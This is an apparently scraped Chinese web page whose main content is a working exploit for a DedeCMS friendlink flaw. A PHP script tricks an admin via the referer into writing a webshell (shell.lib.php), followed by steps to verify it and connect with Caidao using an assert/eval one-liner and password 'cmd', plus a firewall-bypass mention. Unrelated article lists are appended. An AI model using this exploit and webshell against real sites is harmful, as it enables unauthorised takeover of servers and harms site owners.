1.php

//print_r($_SERVER);

$referer = $_SERVER['HTTP_REFERER'];

$dede_login = str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php,取得dede后台的路径

//拼接 exp

$muma = ''.'';

$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';

$url = $dede_login.$exp;

//echo $url;

header("location: ".$url);

// send mail coder

exit();

?>

把1.php上传到你的空间域名

站长审核后台友情连接  后生成一句话地址为http://hack1990.com//include/taglib/shell.lib.php

御剑字典添加/include/taglib/shell.lib.php测试是否存活即可

最后菜刀访问传参一句话http://hack1990.com//include/taglib/shell.lib.php?a=assert&b[0]=@eval($_POST[cmd]);

密码为cmd

过简单防火墙

过防火墙一句话php2017,dedeCMS友情链接getshell漏洞利用相关推荐

  1. dedecms友情链接plus/flink.php页面出错,DedeCMS友情链接flink_add Getshell漏洞管理员CSRF漏洞...

    DedeCMS友情链接漏洞,DedeCMS漏洞, 1.漏洞利用 由于tpl.php中的$action,$content,$filename变量没有初始化,从而能操纵这些变量写入任意的代码. 又由于应用 ...

  2. dedecms友情链接plus/flink.php页面出错,dedecms友情链接flink的调用方法

    标记名称:flink [标签简介] [功能说明]:用于获取友情链接,其对应后台文件为"includetaglibflink.lib.php". [适用范围]:全局标记,适用V55, ...

  3. dedecms友情链接plus/flink.php页面出错,织梦DedeCMS默认友情链接等页面的安全隐患...

    织梦DedeCMS的好处什么的就不说了,今天主要讲一下织梦默认的设置里面一些可能会暴露网站模板路径的安全隐患.有人会说织梦模板的路径暴露了有什么的,当然这个路径是非常重要的了,如果你的系统未进行一些相 ...

  4. dedecms友情链接字数修改

    织梦系统在默认的情况下,统一类型下最多能显示24个链接,每个链接最多显示24个字节.如果想要更改,必须修改flink.lib文件: 在织梦文件夹中找到文件 \ include \ taglib \ f ...

  5. DedeCMS 友情链接按分类网站类型调用的方法

    标签名称:flink 标记简介: 功能说明:用于获取友情链接 适用范围:全局使用 基本语法: {dede:flink row='24'/} 参数说明: type='image' 或textall,图片 ...

  6. Drupal 7.31SQL注入getshell漏洞利用详解及EXP

    0x00 这个漏洞威力确实很大,而且Drupal用的也比较多,使用Fuzzing跑字典应该可以扫出很多漏洞主机,但是做批量可能会对对方网站造成很大的损失,所以我也就只是写个Exp不再深入下去. 0x0 ...

  7. 织梦DeDeCMS友情链接文字显示不全

    文件:/include/taglib/flink.lib.php 把下面代码中的24改为合适的值 $attlist="type|textall,row|24,titlelen|24,link ...

  8. 三个快速有效的交换友情链接的方法

    三个快速有效的交换友情链接的方法 如今,开源建站程序是站长们最常见的,很多站长们都是通过开源建站程序来建设属于自己的网站,到目前未知开源建站程序大同小异,有PHP语音的也有ASP语言的,从最早的dis ...

  9. 织梦友情链接html,DedeCMS首页内页友情链接灵活调用

    大家在交换友情链接的时候,想把PR值低于自己网站的链接设置为内页,但更新页面后,原本设置为内页显示的连接还是跑到了首页. 这个问题一直让很多使用织梦CMS的站长很头疼,在论坛也找不到解决方法,本来我想 ...

最新文章

  1. php程序耗时是负数,php 代码测试,代码越在前面越耗时
  2. HDU2019 数列有序
  3. 前端学习资料及路线名称网站
  4. HtmlHelper让我们的效率更高
  5. WordPress简约昼夜切换导航NDNAV主题模板
  6. matlab怎样设置中文界面
  7. 2017 linux wine 迅雷,wine 迅雷下载安装(wine 迅雷极速版)【Linux上用迅雷7】
  8. 爬虫工程师是干嘛的?Python爬虫工程师需要掌握哪些技能?
  9. 算法基础系列第三章——图论之最小生成树问题
  10. nginx安装部署和配置管理
  11. 用pip安装指定版本的包遇到的坑
  12. http://www.cnblogs.com/xinxin-csharp/p/6146770.html
  13. 有声音显示音频服务器,Win7右下角声音图标显示音频服务未运行的解决方法小结...
  14. 本科毕业论文的引言怎么写?
  15. 基于微信小程序的网上电影购票的设计与实现
  16. Django3+Vue美多商城项目的总结
  17. 囚徒困境困境_社会困境我们主演的恐怖电影
  18. 广和通5G模组成功联调基于高通IPQ系列+骁龙X62的5G CPE方案,已实现大规模量产
  19. 峰值,平均值,准峰值检波器
  20. 进程(六):进程池(Pool)

热门文章

  1. Java面试参考指南–第1部分
  2. 垃圾收集器准则和提示
  3. 使用Selenium和HTML中的动态ID进行Java测试
  4. Spring Java配置
  5. 不要仅仅依靠单元测试
  6. Spring属性占位符配置器–一些不太明显的选项
  7. JavaOne 2012:Lambda之路
  8. guid会重复吗_知网查重会查重表格吗
  9. 浏览器用户脚本管理器(Tampermonkey)
  10. java判断手机号_java使用正则表达式判断手机号的方法示例